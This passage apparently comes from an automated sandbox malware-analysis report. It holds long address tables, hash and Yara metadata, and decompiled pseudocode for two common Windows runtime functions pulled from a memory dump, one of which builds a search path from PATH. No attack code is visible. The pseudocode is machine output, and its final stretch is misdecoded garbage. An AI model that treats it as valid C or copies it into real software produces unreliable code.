                                                                                                                          0x00a0b180
                                                                                                                          0x00a0b186
                                                                                                                          0x00a0b18f
                                                                                                                          0x00a0b198
                                                                                                                          0x00a0b1a4
                                                                                                                          0x00a0b1aa
                                                                                                                          0x00a64802
                                                                                                                          0x00a64802
                                                                                                                          0x00a64805
                                                                                                                          0x00a6480c
                                                                                                                          0x00a6480e
                                                                                                                          0x00a0b1d1
                                                                                                                          0x00a0b1d3
                                                                                                                          0x00a0b1de
                                                                                                                          0x00a0b1de
                                                                                                                          0x00a64817
                                                                                                                          0x00a6481e
                                                                                                                          0x00a64820
                                                                                                                          0x00a64822
                                                                                                                          0x00a64822
                                                                                                                          0x00a64824
                                                                                                                          0x00a64824
                                                                                                                          0x00a6482a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a64835
                                                                                                                          0x00a6483a
                                                                                                                          0x00a6483d
                                                                                                                          0x00a6483f
                                                                                                                          0x00a64842
                                                                                                                          0x00a64842
                                                                                                                          0x00a64842
                                                                                                                          0x00a64846
                                                                                                                          0x00a6484c
                                                                                                                          0x00a6484e
                                                                                                                          0x00a64851
                                                                                                                          0x00a64851
                                                                                                                          0x00a64853
                                                                                                                          0x00a64854
                                                                                                                          0x00a64854
                                                                                                                          0x00a64858
                                                                                                                          0x00a6485a
                                                                                                                          0x00a6485a
                                                                                                                          0x00a6485d
                                                                                                                          0x00a6485f
                                                                                                                          0x00a64861
                                                                                                                          0x00a64861
                                                                                                                          0x00a64866
                                                                                                                          0x00a6486b
                                                                                                                          0x00a6486e
                                                                                                                          0x00a64871
                                                                                                                          0x00a64876
                                                                                                                          0x00a64876
                                                                                                                          0x00a64878
                                                                                                                          0x00a6487b
                                                                                                                          0x00a64884
                                                                                                                          0x00a64884
                                                                                                                          0x00000000
                                                                                                                          0x00a6487d
                                                                                                                          0x00a6487d
                                                                                                                          0x00a64882
                                                                                                                          0x00a64889
                                                                                                                          0x00a64889
                                                                                                                          0x00a6488f
                                                                                                                          0x00a64891
                                                                                                                          0x00a648e0
                                                                                                                          0x00a648e2
                                                                                                                          0x00a648e4
                                                                                                                          0x00a648e4
                                                                                                                          0x00a648e7
                                                                                                                          0x00a648e7
                                                                                                                          0x00a648ed
                                                                                                                          0x00a648f4
                                                                                                                          0x00a648f6
                                                                                                                          0x00a64951
                                                                                                                          0x00a64951
                                                                                                                          0x00a64953
                                                                                                                          0x00a64953
                                                                                                                          0x00a64956
                                                                                                                          0x00a64956
                                                                                                                          0x00a64958
                                                                                                                          0x00a64959
                                                                                                                          0x00a64959
                                                                                                                          0x00a6495d
                                                                                                                          0x00a6495d
                                                                                                                          0x00a6495f
                                                                                                                          0x00a6495f
                                                                                                                          0x00a64965
                                                                                                                          0x00a64969
                                                                                                                          0x00a649ba
                                                                                                                          0x00a649ba
                                                                                                                          0x00a649c1
                                                                                                                          0x00a649c5
                                                                                                                          0x00a649cc
                                                                                                                          0x00a649d4
                                                                                                                          0x00a649d7
                                                                                                                          0x00a649da
                                                                                                                          0x00a649e4
                                                                                                                          0x00a649e5
                                                                                                                          0x00a649f3
                                                                                                                          0x00a64a02
                                                                                                                          0x00000000
                                                                                                                          0x00a64a02
                                                                                                                          0x00a64972
                                                                                                                          0x00a64974
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a64976
                                                                                                                          0x00a64979
                                                                                                                          0x00a64982
                                                                                                                          0x00a64983
                                                                                                                          0x00a64984
                                                                                                                          0x00a6498b
                                                                                                                          0x00a6498d
                                                                                                                          0x00a64991
                                                                                                                          0x00a64993
                                                                                                                          0x00a64999
                                                                                                                          0x00a6499d
                                                                                                                          0x00a649a2
                                                                                                                          0x00a649a2
                                                                                                                          0x00a649a2
                                                                                                                          0x00a64999
                                                                                                                          0x00a649ac
                                                                                                                          0x00000000
                                                                                                                          0x00a649b3
                                                                                                                          0x00a648f8
                                                                                                                          0x00a648fe
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a648fe
                                                                                                                          0x00a64895
                                                                                                                          0x00a6489c
                                                                                                                          0x00a648ad
                                                                                                                          0x00a648b2
                                                                                                                          0x00a648b5
                                                                                                                          0x00a648b7
                                                                                                                          0x00a648ba
                                                                                                                          0x00a648bc
                                                                                                                          0x00a648c6
                                                                                                                          0x00a648c6
                                                                                                                          0x00a648cb
                                                                                                                          0x00a648d1
                                                                                                                          0x00a648d4
                                                                                                                          0x00a648d8
                                                                                                                          0x00a648d8
                                                                                                                          0x00000000
                                                                                                                          0x00a648d8
                                                                                                                          0x00a648be
                                                                                                                          0x00a648c0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a648c2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a648c4
                                                                                                                          0x00000000
                                                                                                                          0x00a64882
                                                                                                                          0x00a6487b
                                                                                                                          0x00a64904
                                                                                                                          0x00a64906
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a64908
                                                                                                                          0x00a6490e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a64910
                                                                                                                          0x00a64917
                                                                                                                          0x00a64917
                                                                                                                          0x00000000
                                                                                                                          0x00a64917
                                                                                                                          0x00a0b1ba
                                                                                                                          0x00a647f9
                                                                                                                          0x00a647fc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a647fc
                                                                                                                          0x00a0b1c0
                                                                                                                          0x00a0b1c0
                                                                                                                          0x00a0b1c3
                                                                                                                          0x00a0b1cb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: _vswprintf_s
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 677850445-0
                                                                                                                          • Opcode ID: ae16a019993c78ac557081261e3d47247b42548885d20a9da72f3b45170254e5
                                                                                                                          • Instruction ID: 0119b74dbf6fd10f33ee014e434dc1cbf0f4049c4cee23e4fd736a8c8e5e5dd1
                                                                                                                          • Opcode Fuzzy Hash: ae16a019993c78ac557081261e3d47247b42548885d20a9da72f3b45170254e5
                                                                                                                          • Instruction Fuzzy Hash: C651E176D002598EDF35CF68C945BAEBBB0BF48710F2042ADE859AB282D7704D85CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A2B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 76%
                                                                                                                          			E00A2B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0xafd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E00A27D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E00AD8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E00A49E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E00A4B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E00A4CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E00A27D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E00AD8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E00A4AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0xaf8628; // 0x0
								_v68 = _t77;
								_t78 =  *0xaf862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0xaf8628; // 0x0
							_t116 =  *0xaf862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                                          0x00a2b94c
                                                                                                                          0x00a2b956
                                                                                                                          0x00a2b95c
                                                                                                                          0x00a2b95e
                                                                                                                          0x00a2b964
                                                                                                                          0x00a2b969
                                                                                                                          0x00a2b96d
                                                                                                                          0x00a2b96d
                                                                                                                          0x00a2b970
                                                                                                                          0x00a2b974
                                                                                                                          0x00a2b97a
                                                                                                                          0x00a2badf
                                                                                                                          0x00a2badf
                                                                                                                          0x00a2bae2
                                                                                                                          0x00a2bae4
                                                                                                                          0x00a2bae6
                                                                                                                          0x00a2baf0
                                                                                                                          0x00a72cb8
                                                                                                                          0x00a2baf6
                                                                                                                          0x00a2baf6
                                                                                                                          0x00a2baf6
                                                                                                                          0x00a2bafd
                                                                                                                          0x00a2bb1f
                                                                                                                          0x00a2bb1f
                                                                                                                          0x00a2baff
                                                                                                                          0x00a2bb00
                                                                                                                          0x00a2bb00
                                                                                                                          0x00a2bb03
                                                                                                                          0x00a2bb03
                                                                                                                          0x00a2bacb
                                                                                                                          0x00a2bacf
                                                                                                                          0x00a2bad0
                                                                                                                          0x00a2bad1
                                                                                                                          0x00a2badc
                                                                                                                          0x00a2badc
                                                                                                                          0x00a2b980
                                                                                                                          0x00a2b980
                                                                                                                          0x00a2b988
                                                                                                                          0x00a2b98b
                                                                                                                          0x00a2b98d
                                                                                                                          0x00a2b990
                                                                                                                          0x00a2b993
                                                                                                                          0x00a2b999
                                                                                                                          0x00a2b99b
                                                                                                                          0x00a2b9a1
                                                                                                                          0x00a2b9a5
                                                                                                                          0x00a2b9aa
                                                                                                                          0x00a2b9b0
                                                                                                                          0x00a2b9bb
                                                                                                                          0x00a2b9c0
                                                                                                                          0x00a2b9c3
                                                                                                                          0x00a2b9ca
                                                                                                                          0x00a2b9cc
                                                                                                                          0x00a2b9cf
                                                                                                                          0x00a2b9d3
                                                                                                                          0x00a2b9d7
                                                                                                                          0x00a2ba94
                                                                                                                          0x00a2ba94
                                                                                                                          0x00a2ba98
                                                                                                                          0x00a2baa3
                                                                                                                          0x00a72ccb
                                                                                                                          0x00a2baa9
                                                                                                                          0x00a2baa9
                                                                                                                          0x00a2baa9
                                                                                                                          0x00a2bab1
                                                                                                                          0x00a72cd5
                                                                                                                          0x00a72cdd
                                                                                                                          0x00a72cdd
                                                                                                                          0x00a2babb
                                                                                                                          0x00a2babc
                                                                                                                          0x00a2bac2
                                                                                                                          0x00a2bac3
                                                                                                                          0x00a2bac3
                                                                                                                          0x00a2bac6
                                                                                                                          0x00000000
                                                                                                                          0x00a2b9dd
                                                                                                                          0x00a2b9dd
                                                                                                                          0x00a2b9e7
                                                                                                                          0x00a2b9e7
                                                                                                                          0x00a2b9ec
                                                                                                                          0x00a2b9ec
                                                                                                                          0x00a2b9f1
                                                                                                                          0x00a2b9f5
                                                                                                                          0x00a2b9fa
                                                                                                                          0x00a2ba00
                                                                                                                          0x00a2ba0c
                                                                                                                          0x00a2ba10
                                                                                                                          0x00a2ba10
                                                                                                                          0x00a2ba12
                                                                                                                          0x00a2ba18
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a2bb26
                                                                                                                          0x00a2bb26
                                                                                                                          0x00a2ba1e
                                                                                                                          0x00a2ba1e
                                                                                                                          0x00a2ba23
                                                                                                                          0x00a2ba25
                                                                                                                          0x00a2ba2c
                                                                                                                          0x00a2ba30
                                                                                                                          0x00a2ba35
                                                                                                                          0x00a2ba35
                                                                                                                          0x00a2ba41
                                                                                                                          0x00a2ba46
                                                                                                                          0x00a2ba4c
                                                                                                                          0x00a2ba50
                                                                                                                          0x00a2ba54
                                                                                                                          0x00a2ba6a
                                                                                                                          0x00a2ba6e
                                                                                                                          0x00a2ba70
                                                                                                                          0x00a2ba74
                                                                                                                          0x00a2ba78
                                                                                                                          0x00a2ba7a
                                                                                                                          0x00a2ba7c
                                                                                                                          0x00a2ba8e
                                                                                                                          0x00a2ba90
                                                                                                                          0x00a2ba92
                                                                                                                          0x00a2bb14
                                                                                                                          0x00a2bb14
                                                                                                                          0x00a2bb16
                                                                                                                          0x00a2bb16
                                                                                                                          0x00000000
                                                                                                                          0x00a2ba7c
                                                                                                                          0x00a2bb0a
                                                                                                                          0x00a2bb0d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a2bb0f

                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A2B9A5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 885266447-0
                                                                                                                          • Opcode ID: e6caec54d1c946a9995dd35030f07c6d1033abd83beb39952075dcd4c3bce9c7
                                                                                                                          • Instruction ID: b553aef0e208200e28ba32764e547f975b10f4b7d1f3575ffec84a9e56824619
                                                                                                                          • Opcode Fuzzy Hash: e6caec54d1c946a9995dd35030f07c6d1033abd83beb39952075dcd4c3bce9c7
                                                                                                                          • Instruction Fuzzy Hash: 2C512671629310CFC720CF6DD580A2ABBE5BB88750F24896EE59587355D731EC44CBA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A32581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E00A32581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200223, char _a1546911903) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t239;
				signed int _t243;
				intOrPtr _t244;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				signed int _t256;
				signed int _t263;
				signed int _t266;
				signed int _t274;
				signed int _t280;
				signed int _t282;
				void* _t284;
				void* _t285;
				signed int _t286;
				unsigned int _t289;
				signed int _t293;
				void* _t294;
				signed int _t295;
				signed int _t299;
				intOrPtr _t312;
				signed int _t321;
				signed int _t323;
				signed int _t324;
				signed int _t328;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				void* _t336;

				_t333 = _t335;
				_t336 = _t335 - 0x4c;
				_v8 =  *0xafd360 ^ _t333;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t328 = 0xafb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t289 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t280 = 0x48;
				_t309 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t321 = 0;
				_v37 = _t309;
				if(_v48 <= 0) {
					L16:
					_t45 = _t280 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t329 = 0xc0000106;
						goto L32;
					} else {
						_t328 = L00A24620(_t289,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t280);
						_v52 = _t328;
						__eflags = _t328;
						if(_t328 == 0) {
							_t329 = 0xc0000017;
							goto L32;
						} else {
							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
							_t50 = _t328 + 0x48; // 0x48
							_t323 = _t50;
							_t309 = _v32;
							 *(_t328 + 0x3c) = _t280;
							_t282 = 0;
							 *((short*)(_t328 + 0x30)) = _v48;
							__eflags = _t309;
							if(_t309 != 0) {
								 *(_t328 + 0x18) = _t323;
								__eflags = _t309 - 0xaf8478;
								 *_t328 = ((0 | _t309 == 0x00af8478) - 0x00000001 & 0xfffffffb) + 7;
								E00A4F3E0(_t323,  *((intOrPtr*)(_t309 + 4)),  *_t309 & 0x0000ffff);
								_t309 = _v32;
								_t336 = _t336 + 0xc;
								_t282 = 1;
								__eflags = _a8;
								_t323 = _t323 + (( *_t309 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t274 = E00A939F2(_t323);
									_t309 = _v32;
									_t323 = _t274;
								}
							}
							_t293 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t329 = _v68;
								__eflags = 0;
								 *((short*)(_t323 - 2)) = 0;
								goto L32;
							} else {
								_t280 = _t328 + _t282 * 4;
								_v56 = _t280;
								do {
									__eflags = _t309;
									if(_t309 != 0) {
										_t239 =  *(_v60 + _t293 * 4);
										__eflags = _t239;
										if(_t239 == 0) {
											goto L30;
										} else {
											__eflags = _t239 == 5;
											if(_t239 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t280 =  *(_v60 + _t293 * 4);
										 *(_t280 + 0x18) = _t323;
										_t243 =  *(_v60 + _t293 * 4);
										__eflags = _t243 - 8;
										if(_t243 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t243 * 4 +  &M00A32959))) {
												case 0:
													__ax =  *0xaf8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E00A4F3E0(__edi,  *0xaf848c, __ax & 0x0000ffff);
														__eax =  *0xaf8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E00A4F3E0(_t323, _v80, _v64);
													_t269 = _v64;
													goto L26;
												case 2:
													 *0xaf8480 & 0x0000ffff = E00A4F3E0(__edi,  *0xaf8484,  *0xaf8480 & 0x0000ffff);
													__eax =  *0xaf8480 & 0x0000ffff;
													__eax = ( *0xaf8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E00A4F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E00A4F3E0(_t323, _v76, _v36);
														_t269 = _v36;
													}
													L26:
													_t336 = _t336 + 0xc;
													_t323 = _t323 + (_t269 >> 1) * 2 + 2;
													__eflags = _t323;
													L27:
													_push(0x3b);
													_pop(_t271);
													 *((short*)(_t323 - 2)) = _t271;
													goto L28;
												case 6:
													__ebx =  *0xaf575c;
													__eflags = __ebx - 0xaf575c;
													if(__ebx != 0xaf575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E00A4F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0xaf575c;
														} while (__ebx != 0xaf575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0xaf8478 & 0x0000ffff = E00A4F3E0(__edi,  *0xaf847c,  *0xaf8478 & 0x0000ffff);
													__eax =  *0xaf8478 & 0x0000ffff;
													__eax = ( *0xaf8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E00A939F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0xaf6e58 & 0x0000ffff = E00A4F3E0(__edi,  *0xaf6e5c,  *0xaf6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0xaf6e58 & 0x0000ffff;
													__eax = ( *0xaf6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t293 = _v16;
													_t309 = _v32;
													L29:
													_t280 = _t280 + 4;
													__eflags = _t280;
													_v56 = _t280;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t293 = _t293 + 1;
									_v16 = _t293;
									__eflags = _t293 - _v48;
								} while (_t293 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t243 =  *(_v60 + _t321 * 4);
						if(_t243 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t243 * 4 +  &M00A32935))) {
							case 0:
								__ax =  *0xaf8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t309 =  &_v64;
								_v80 = E00A32E3E(0,  &_v64);
								_t280 = _t280 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0xaf8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xaf8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E00A1EEF0(0xaf79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E00A1EB70(__ecx, 0xaf79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t217 = _v72;
											__eflags = _t217;
											if(_t217 != 0) {
												L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
											}
											_t218 = _v52;
											__eflags = _t218;
											if(_t218 != 0) {
												__eflags = _t329;
												if(_t329 < 0) {
													L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
													_t218 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t289 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0xaf7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L00A24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E00A1EB70(__ecx, 0xaf79a0);
										__eax = _v52;
										L36:
										_pop(_t322);
										_pop(_t330);
										__eflags = _v8 ^ _t333;
										_pop(_t281);
										return E00A4B640(_t218, _t281, _v8 ^ _t333, _t309, _t322, _t330);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t276 = _v56;
								if(_v56 != 0) {
									_t309 =  &_v36;
									_t278 = E00A32E3E(_t276,  &_v36);
									_t289 = _v36;
									_v76 = _t278;
								}
								if(_t289 == 0) {
									goto L44;
								} else {
									_t280 = _t280 + 2 + _t289;
								}
								goto L14;
							case 6:
								__eax =  *0xaf5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0xaf8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xaf8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0xaf6e58 & 0x0000ffff;
								__eax = ( *0xaf6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t321 = _t321 + 1;
								if(_t321 >= _v48) {
									goto L16;
								} else {
									_t309 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t294 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *0xa3286600 = _t243;
					_t244 = _t243 + _t243;
					asm("daa");
					 *0xa3262e00 = _t244;
					 *((intOrPtr*)(_t328 + 0x28)) =  *((intOrPtr*)(_t328 + 0x28)) + _t244;
					 *0xa3260500 = _t244;
					 *_t323 =  *_t323 + _t280;
					_pop(_t284);
					asm("cmpsd");
					 *((intOrPtr*)(_t244 +  &_a1530200223)) =  *((intOrPtr*)(_t244 +  &_a1530200223)) + _t309;
					asm("cmpsd");
					 *_t309 =  *_t309 + _t244;
					 *((intOrPtr*)(_t284 - 0x5cd78000)) =  *((intOrPtr*)(_t284 - 0x5cd78000)) - _t336;
					asm("daa");
					 *0xa3281e00 = _t244;
					 *((intOrPtr*)(_t328 + 0x28)) =  *((intOrPtr*)(_t328 + 0x28)) + _t294;
					 *0xa3275d00 = _t244;
					_pop(_t285);
					asm("cmpsd");
					 *((intOrPtr*)(_t244 + _t284 +  &_a1546911903)) =  *((intOrPtr*)(_t244 + _t284 +  &_a1546911903)) + _t309 + _t309;
					asm("cmpsd");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
